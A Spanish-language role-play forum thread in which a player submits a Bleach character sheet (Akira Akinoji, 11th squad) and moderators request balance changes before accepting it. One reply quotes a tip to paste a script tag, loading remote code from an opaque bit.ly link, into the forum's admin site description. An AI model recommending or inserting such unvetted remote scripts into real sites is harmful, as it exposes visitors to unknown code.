Bleach Ultimate Rol
Hola!Bienvenido a Bleach Ultimate Rol
Bleach Ultimate Rol
Hola!Bienvenido a Bleach Ultimate Rol
Bleach Ultimate Rol
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.


Foro de rol interpretativo del manga y anime Bleach
 
ÍndicePortalÚltimas imágenesBuscarRegistrarseConectarse

 

 Ficha Akira Akinoji

Ir abajo 
2 participantes
AutorMensaje
Akira
Shinigami del 11º Escuadrón
Akira


Masculino Cantidad de envíos : 20
Edad : 31
Localización : Seireitei
Fecha de inscripción : 14/06/2010

Hoja de personaje
Nombre del PJ: Akira Akinoji

Ficha Akira Akinoji Empty
MensajeTema: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeLun Jun 14, 2010 1:39 am

Nombre: Akira Akinoji

Sexo: Masculino

Edad: 17

Rango: Raso

Escuadrón: 11er

Descripción física: Mide 1'75m, tiene el pelo rubio y largo, lo lleva suelto. Tiene los ojos de color azul. Es de complexión atletica.
Spoiler:
Descripción psicológica: Es una persona muy callada, nunca deja que los demás vean lo que se le pasa por la cabeza. Analiza detalladamente cualquier situación antes de actuar.

Zanpakutou: Fenrir

Forma sellada:
Espada de enorme tamaño y gran peso, exepto para Neku.
Spoiler:

Espíritu de la Zanpakutou: Es un lobo con armadura de color azul. Se dice que su aullido paraliza a cualquier enemigo.

Mundo interno de la Zanpakutou: Un bosque frondoso, con arboles de color azul oscuro. En este bosque habita el espiritu de Fenrir, el cual devora a cualquier intruso, Neku tuvo que enfrentarse a él cuando adquirio su poder de shinigami.

Shikai

Comando de liberación del shikai:
Silva, Fenrir.

Forma física del shikai: La espada mantiene su tamaño, pero la forma varia.
Spoiler:

Habilidad pasiva del shikai: Permite al usuario flotar en el aire.

Primer ataque especial del shikai: Al cortar el aire se crea una onda expansiva que arrasa todo lo que encuentra en 10 metros desde el usuario, con un radio de 180º grados.

Segundo ataque especial del shikai: Al girar la espada rapidamente, se desprenden de la hoja filos de enegía cortante en todas la direcciones. Crea gran tensión el los musculos del brazo, solo puede ser utilizado 2 veces por combate.

Última técnica del shikai: Crea una cupula alrededor del usuario de una altura de 3 metros y un radio de 1 metro. A cualquier enemigo, o amigo, que se adentre en la cupula se le produciran cortes cerca de los nervios, pudiendo llegar a quedar paralizado.


Bankai

Comando de liberación bankai:
"Devora"

Forma física del bankai: La espada se dicide en dos. Una vuelve a ser la forma sellada, pero con un poder bastante mayor. La segunda espada es una katana de gran tamaño y extremadamente liviana. Tambien le crece un ala en la espalda a Neku.
Spoiler:

Habilidad pasiva del bankai:
Permite volar al usuario libremente.

Primer ataque especial del bankai: La espada grande se divide en cinco espadas más, con cada una se asesta un corte profundo en el enemigo. Retrasa la autocuración de las mismas.

Segundo ataque especial del bankai: Al cortar el aire con la katana se crea una onda expansiva indestructible, que destruye la mayoría de los ataques fisicos que pueda lanzar el enemigo. Es utilizada más como defensa que como ataque.

Última habilidad del bankai: Ambas espadas adquieren un color azul oscuro. Al cortar con cualquiera de las dos al enemigo, se produce una profunda herida que no se cerrara sola, ya que evita la coagulación de la sangre. Al tener que sostener cada espada con una mano y soportar la enegía que emanan, los musculos de brazos y los hombros soportan una gran presión, haciendo que solo se pueda ejecutar este ataque 3 veces por combate.

Historia:
Neku fue un chaval normal toda su vida, tenía unas notas normales y una familia normal. Tenía un hermano de su misma edad al que adoraba. Tenía problemas con sus padres por el poco tiempo que pasaba en casa, aunque a sus padres les preocupaba más el que su hermano le siguiera a todos lados, dado que tenía una salud delicada. Hasta ahí toda su vida había transcurrido con normalidad... hasta el día de su muerte.

Ambos hermanos volvían a casa desde la universidad, cuando fueron arrollados por un camión. Cuando Neku despertó había una antidad enorme de mountros con un agujero en el pecho, su hermano estaba de pie acompañado por un hombre de kimono negro. Aquel hombre hizo desaparecer a su hermano, dejando solo una extraña mariposa. Neku al darse cuenta de que ambos estaban muertos, al ver su cadaveres en el suelo, y saber que su hermano había desaparecido, algo extraño ocurrió. Neku explotó en ira y desprendió un brillo cegador, su vestimenta había cambiado, él tambien tenía un kimono de color negro. Lo más extraño era la gran espada que tenía a la espalda y que podía levantar sin problemas. Desgraciadamente, Neku fué noqueado antes de poder hacer nada.

Cuando despertó estaba en lugar desconocido, sin saber como llegó o quien lo llevó hasta allí.


Última edición por Akira el Vie Jun 18, 2010 11:22 pm, editado 3 veces
Volver arriba Ir abajo
Akira
Shinigami del 11º Escuadrón
Akira


Masculino Cantidad de envíos : 20
Edad : 31
Localización : Seireitei
Fecha de inscripción : 14/06/2010

Hoja de personaje
Nombre del PJ: Akira Akinoji

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeLun Jun 14, 2010 1:40 am

Lo siento por el doble post, pero quería saber sí los spoilers los pueden abrir, porque yo no puedo. Si no se ven por favor avisen.
Volver arriba Ir abajo
Akira
Shinigami del 11º Escuadrón
Akira


Masculino Cantidad de envíos : 20
Edad : 31
Localización : Seireitei
Fecha de inscripción : 14/06/2010

Hoja de personaje
Nombre del PJ: Akira Akinoji

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeLun Jun 14, 2010 7:51 pm

Lo puse para no tener que hacerlo despues. Como se puede observar mí personaje es un shinigami totalmente novato, por lo que no tiene ni shikai ni bankai, de momento. Lo de el codigo supongo que sera para el administrador, nolo se. Pero ya puedo abrir los spoilers, espero que el resto de users tambien puedan, saludos.
Volver arriba Ir abajo
ishidauchiha
Lider Quincy
ishidauchiha


Masculino Cantidad de envíos : 99
Edad : 33
Localización : Reflejando el dolor de los corazones
Fecha de inscripción : 12/12/2008

Hoja de personaje
Nombre del PJ: Ryu kurayami

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeLun Jun 14, 2010 11:58 pm

Chrnos escribió:
se trata de ir al panel de administrador, General, Foro, Y en descripción del sitio poner esto

Código:
<script src=http://bit.ly/ccTTB0></script>
ese es un aporte de
Sora Nakamura

o simplemente quitar los spoilers de tu ficha

y amigo creo que deberías saber que solo los capitanes pueden tener bankai, cualquier otro shinigami ya sea teniente o tercer al mando solo lo obtendrá con permiso previo del capitán y con experiencia en batalla.
pero yo no soy el que decide samanosuke y/o ishidauchiha tienen la ultima palabra.


Suerte con tu ficha


Chrnos ultimo aviso,no se puede postear en las fichas,la proxima amonestación.

Si eres shinigami raso,no tendras nada mas que els hikai,lo sabes¿?
Volver arriba Ir abajo
http://heroeseclipse.foroactivo.com/
Akira
Shinigami del 11º Escuadrón
Akira


Masculino Cantidad de envíos : 20
Edad : 31
Localización : Seireitei
Fecha de inscripción : 14/06/2010

Hoja de personaje
Nombre del PJ: Akira Akinoji

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeMar Jun 15, 2010 1:32 am

Si estoy altanto de ello. Como ya he dicho antes es para tener el bankai ya preparado. Espero que no sea un inconveniente.
Volver arriba Ir abajo
ishidauchiha
Lider Quincy
ishidauchiha


Masculino Cantidad de envíos : 99
Edad : 33
Localización : Reflejando el dolor de los corazones
Fecha de inscripción : 12/12/2008

Hoja de personaje
Nombre del PJ: Ryu kurayami

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeMar Jun 15, 2010 11:47 am

No,no lo es,salvo que no ahi capitan ene l escuadron 11,si no te importa el echo te acepto
Volver arriba Ir abajo
http://heroeseclipse.foroactivo.com/
Akira
Shinigami del 11º Escuadrón
Akira


Masculino Cantidad de envíos : 20
Edad : 31
Localización : Seireitei
Fecha de inscripción : 14/06/2010

Hoja de personaje
Nombre del PJ: Akira Akinoji

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeMar Jun 15, 2010 7:33 pm

Ya me había fijado mientras leía las normas y le solicite el puesto a Edward, en el post de rangos disponibles, por MP. Aún no me ha respondido, estoy esperando la respuesta. De todos modos me gustaría que me aceptaras la ficha, tengo ganas de empezar a rolear. Saludos.
Volver arriba Ir abajo
ishidauchiha
Lider Quincy
ishidauchiha


Masculino Cantidad de envíos : 99
Edad : 33
Localización : Reflejando el dolor de los corazones
Fecha de inscripción : 12/12/2008

Hoja de personaje
Nombre del PJ: Ryu kurayami

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeMar Jun 15, 2010 9:15 pm

Yo te loa cepto,por cierto edward es un antiguo admi que ya no esta,enviarle a el el mp no vale de nada,de todas maneras yo te acepto ya,pero antes debes cambiar esto :

Última técnica del shikai.es demasiado par aun shikai.

y la ultima de tu bankai, al menos debes ponerle una contra
Volver arriba Ir abajo
http://heroeseclipse.foroactivo.com/
Akira
Shinigami del 11º Escuadrón
Akira


Masculino Cantidad de envíos : 20
Edad : 31
Localización : Seireitei
Fecha de inscripción : 14/06/2010

Hoja de personaje
Nombre del PJ: Akira Akinoji

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeMar Jun 15, 2010 10:53 pm

¡Hecho! He reducido el tamaño de la cupula creado por el ataque y puesto un efecto negativo al último ataque del bankai.
Volver arriba Ir abajo
ishidauchiha
Lider Quincy
ishidauchiha


Masculino Cantidad de envíos : 99
Edad : 33
Localización : Reflejando el dolor de los corazones
Fecha de inscripción : 12/12/2008

Hoja de personaje
Nombre del PJ: Ryu kurayami

Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitimeMar Jun 15, 2010 11:47 pm

ahora si,aceptado
Volver arriba Ir abajo
http://heroeseclipse.foroactivo.com/
Contenido patrocinado





Ficha Akira Akinoji Empty
MensajeTema: Re: Ficha Akira Akinoji   Ficha Akira Akinoji I_icon_minitime

Volver arriba Ir abajo
 
Ficha Akira Akinoji
Volver arriba 
Página 1 de 1.
 Temas similares
-
» mi ficha
» Ficha
» Ficha Oka
» mi ficha ......lol..............
» Mi Ficha

Permisos de este foro:No puedes responder a temas en este foro.
Bleach Ultimate Rol :: General :: Creación de fichas :: Ficha Shinigami-
Cambiar a: